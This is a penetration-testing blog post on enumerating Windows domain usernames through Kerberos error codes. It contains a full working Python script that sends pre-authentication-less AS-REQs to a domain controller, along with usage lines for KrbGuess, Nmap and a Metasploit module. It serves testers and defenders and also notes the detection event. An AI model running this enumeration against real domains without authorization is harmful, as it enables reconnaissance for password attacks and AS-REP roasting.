Kerberos Domain Username Enumeration

Kerberos: Enumerating Domain Usernames

Enumerating domain account names

Welcome to a technical blog post for Penetration Testers by our Principal Security Consultant, Matt Byrne.

In recent years, enumerating valid operating-system-level usernames from up-to-date, well-maintained Windows environments has become increasingly difficult, even from an internal test perspective.

Where RID cycling once provided a full list of domain users, this is no longer the case.

However, for internal assessments, the Kerberos service (88/tcp) on a domain controller still provides a happy hunting ground for enumerating domain account names.

Username enumeration relies on the error code the KDC returns to an AS-REQ that carries no pre-authentication data. Because no password is ever supplied, these requests do not increment the account's bad-password count:

User status          Kerberos error code
Present/Enabled      KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
Locked/Disabled      KDC_ERR_CLIENT_REVOKED - Client's credentials have been revoked (also returned for expired accounts)
Does not exist       KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
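The exchange behind that table, as an added example that is not code from the original post or from any of the tools it mentions: a pre-auth-less AS-REQ is built by hand, sent over 88/tcp with the TCP length prefix, and the KRB-ERROR (or AS-REP) that comes back is mapped to the user status above. The function names (build_as_req, classify_reply, enumerate_users), the CORP.LOCAL realm, and the sample KRB-ERROR produced by build_krb_error are my own assumptions for illustration; the DER helpers are deliberately minimal and assume single-byte tags, which holds for every Kerberos field used here.

```python
import random
import socket
import struct

# Kerberos error codes (RFC 4120, section 7.5.9) returned to an AS-REQ without padata.
KDC_ERR_C_PRINCIPAL_UNKNOWN = 6   # client not found in Kerberos database
KDC_ERR_CLIENT_REVOKED = 18       # client's credentials have been revoked
KDC_ERR_PREAUTH_REQUIRED = 25     # additional pre-authentication required

STATUS = {
    KDC_ERR_PREAUTH_REQUIRED: "present/enabled",
    KDC_ERR_CLIENT_REVOKED: "locked/disabled/expired",
    KDC_ERR_C_PRINCIPAL_UNKNOWN: "does not exist",
}

# --- minimal DER encoder, enough for AS-REQ and KRB-ERROR --------------------
def der_len(n):
    if n < 0x80:
        return bytes([n])
    b = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(b)]) + b

def der(tag, body):
    return bytes([tag]) + der_len(len(body)) + body

def ctx(n, body):   # context-specific, constructed: [n] EXPLICIT
    return der(0xA0 | n, body)

def der_int(n):     # INTEGER, two's complement, minimal length (n >= 0 here)
    return der(0x02, n.to_bytes(n.bit_length() // 8 + 1, "big", signed=True))

def der_str(s):     # KerberosString is a GeneralString
    return der(0x1B, s.encode("utf-8"))

def der_seq(*items):
    return der(0x30, b"".join(items))

def principal(name_type, *parts):   # PrincipalName
    return der_seq(ctx(0, der_int(name_type)),
                   ctx(1, der_seq(*(der_str(p) for p in parts))))

def build_as_req(username, realm, nonce=None):
    """AS-REQ for krbtgt/REALM with NO padata, so the KDC answers with the error
    code that reveals the account's status instead of issuing a ticket."""
    if nonce is None:
        nonce = random.getrandbits(31)
    body = der_seq(
        ctx(0, der(0x03, b"\x00\x40\x80\x00\x00")),   # kdc-options: forwardable, renewable
        ctx(1, principal(1, username)),                # cname, NT-PRINCIPAL
        ctx(2, der_str(realm)),                        # realm: upper-case DNS domain name
        ctx(3, principal(2, "krbtgt", realm)),         # sname, NT-SRV-INST
        ctx(5, der(0x18, b"20370913024805Z")),         # till, GeneralizedTime
        ctx(7, der_int(nonce)),
        ctx(8, der_seq(der_int(18), der_int(17), der_int(23))),  # etypes: AES256, AES128, RC4
    )
    kdc_req = der_seq(ctx(1, der_int(5)),    # pvno
                      ctx(2, der_int(10)),   # msg-type KRB_AS_REQ
                      ctx(4, body))          # req-body; [3] padata deliberately absent
    return der(0x6A, kdc_req)                # [APPLICATION 10] AS-REQ

# --- minimal DER reader and reply classification ----------------------------
def read_tlv(buf, pos=0):
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:
        n = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + ln], pos + ln

def classify_reply(msg):
    """Map a raw KDC reply (AS-REP or KRB-ERROR) to the user's status."""
    tag, body, _ = read_tlv(msg)
    if tag == 0x6B:   # [APPLICATION 11] AS-REP: account has pre-auth disabled (AS-REP roastable)
        return "present/enabled (pre-authentication not required)"
    if tag != 0x7E:   # [APPLICATION 30] KRB-ERROR
        raise ValueError("unexpected Kerberos message tag 0x%02x" % tag)
    _, fields, _ = read_tlv(body)
    pos = 0
    while pos < len(fields):
        t, v, pos = read_tlv(fields, pos)
        if t == 0xA6:  # [6] error-code
            code = int.from_bytes(read_tlv(v)[1], "big", signed=True)
            return STATUS.get(code, "other KDC error %d" % code)
    raise ValueError("KRB-ERROR without error-code")

def build_krb_error(error_code, realm, stime=b"20240101000000Z"):
    """Constructed sample KRB-ERROR (mandatory fields only) for offline testing."""
    return der(0x7E, der_seq(
        ctx(0, der_int(5)), ctx(1, der_int(30)),
        ctx(4, der(0x18, stime)), ctx(5, der_int(0)),
        ctx(6, der_int(error_code)),
        ctx(9, der_str(realm)), ctx(10, principal(2, "krbtgt", realm))))

def recv_exact(sock, n):
    data = b""
    while len(data) < n:
        chunk = sock.recv(n - len(data))
        if not chunk:
            raise ConnectionError("KDC closed the connection")
        data += chunk
    return data

def enumerate_users(dc_ip, realm, usernames, timeout=5.0):
    """Send one pre-auth-less AS-REQ per name over 88/tcp and classify each reply."""
    results = {}
    for user in usernames:
        req = build_as_req(user, realm)
        with socket.create_connection((dc_ip, 88), timeout=timeout) as s:
            s.sendall(struct.pack(">I", len(req)) + req)   # TCP framing: 4-byte length prefix
            want = struct.unpack(">I", recv_exact(s, 4))[0] & 0x7FFFFFFF
            results[user] = classify_reply(recv_exact(s, want))
    return results

if __name__ == "__main__":
    import sys
    # usage: python3 krb_enum.py DC_IP REALM userlist.txt
    dc, realm, path = sys.argv[1:4]
    names = [line.strip() for line in open(path) if line.strip()]
    for user, status in enumerate_users(dc, realm, names).items():
        print("%-24s %s" % (user, status))
```

The realm must be the upper-case Kerberos realm (normally the DNS domain name in capitals), or every name comes back as unknown. A reply with the AS-REP tag rather than a KRB-ERROR means the account has "Do not require Kerberos preauthentication" set, which is worth recording separately because the AS-REP can be cracked offline. On the blue-team side, these requests do not touch bad-password counts, but a domain controller with Kerberos Authentication Service auditing enabled still logs event 4768 with failure code 0x6 for every nonexistent name, so a wordlist run is noisy.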

Several good tools have been around for a while, allowing us to leverage these Kerberos responses to identify valid or invalid domain accounts.

Two of the tools I used until recently are provided by Patrik Karlsson. The first is the standalone Java tool KrbGuess; the second is the krb5-enum-users NSE script for Nmap:

Krbguess

Usage:

java -jar kerbguess.jar -r [domain] -d [user list] -s [DC IP]

[Screenshot: KrbGuess output]

krb5-enum-users NSE Script for nmap

Usage:

nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='[domain]',userdb=[user list] [DC IP]

The script is in the auth and intrusive categories, so it is not part of Nmap's default script set and must be selected explicitly with --script.

[Screenshot: Nmap krb5-enum-users NSE script output]

Leveraging Kerberos within the Metasploit Framework

Like most Penetration Testers, I’m a heavy user of the Metasploit Framework. Having the ability to leverage the Kerberos functionality within the framework has appealed to me for years.

For whatever reason it never seems to have been implemented, so I decided to try and implement it myself.

Leaning heavily on the Kerberos support provided by other Metasploit contributors and using the auxiliary module for ms14_068_kerberos_checksum as a template, the process was a lot simpler than I had anticipated.

The new Metasploit auxiliary module can be found in the following location:

auxiliary/gather/kerberos_enumusers

As with the Kerberos enumeration tools discussed previously, three values should be provided:

  • Domain Name (DOMAIN)
  • Domain Controller IP (RHOST)
  • User list (USER_FILE)


The module can now be run to enumerate valid (and disabled/locked) domain accounts via the Kerberos service:

[Screenshot: running the module]

Thanks to an addition by bwatters-r7 at Rapid7, any valid enumerated usernames are stored in the Metasploit database for retrieval using the 'creds' command:

[Screenshot: creds command output]

References and further reading

  • cqure.net: KrbGuess
  • Nmap NSE documentation: krb5-enum-users
  • Rapid7: Microsoft Kerberos Checksum Validation Vulnerability (ms14_068_kerberos_checksum)